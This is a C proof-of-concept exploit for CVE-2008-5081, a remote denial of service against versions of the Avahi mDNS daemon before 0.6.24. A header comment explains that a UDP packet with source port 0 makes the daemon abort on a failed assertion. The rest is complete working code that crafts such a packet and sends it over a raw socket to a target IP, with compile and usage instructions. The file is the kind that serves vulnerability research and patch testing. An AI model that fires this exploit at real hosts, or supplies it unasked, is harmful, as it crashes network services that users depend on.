|
/* * cve-2008-5081.c * * Avahi mDNS Daemon Remote DoS < 0.6.24 * Jon Oberheide <jon@oberheide.org> * http://jon.oberheide.org * * Usage: * * gcc cve-2008-5081.c -ldnet -o cve-2008-5081 * ./cve-2008-5081 1.2.3.4 * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5081 * * Crafted mDNS packet with source port 0 can cause avahi-daemon * to abort() due to failed assertion assert(port > 0); in * originates_from_local_legacy_unicast_socket() function in * avahi-core/server.c. * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <dnet.h> int main(int argc, char **argv) { ip_t *sock; intf_t *intf; struct addr dst; struct ip_hdr *ip; struct udp_hdr *udp; struct intf_entry entry; int len = IP_HDR_LEN + UDP_HDR_LEN; char buf[len]; if (argc < 2 || addr_aton(argv[1], &dst)) { printf("error: please specify a target ip address\n"); return 1; } memset(buf, 0, sizeof(buf)); ip = (struct ip_hdr *) buf; ip->ip_v = 4; ip->ip_hl = 5; ip->ip_tos = 0; ip->ip_off = 0; ip->ip_sum = 0; ip->ip_ttl = IP_TTL_MAX; ip->ip_p = IP_PROTO_UDP; ip->ip_id = htons(0xdead); ip->ip_len = htons(len); udp = (struct udp_hdr *) (buf + IP_HDR_LEN); udp->uh_sum = 0; udp->uh_sport = htons(0); udp->uh_dport = htons(5353); udp->uh_ulen = htons(UDP_HDR_LEN); intf = intf_open(); intf_get_dst(intf, &entry, &dst); intf_close(intf); ip->ip_src = entry.intf_addr.addr_ip; ip->ip_dst = dst.addr_ip; ip_checksum(buf, len); sock = ip_open(); if (!sock) { printf("error: root privileges needed for raw socket\n"); return 1; } ip_send(sock, buf, len); ip_close(sock); return 0; }
|
|
|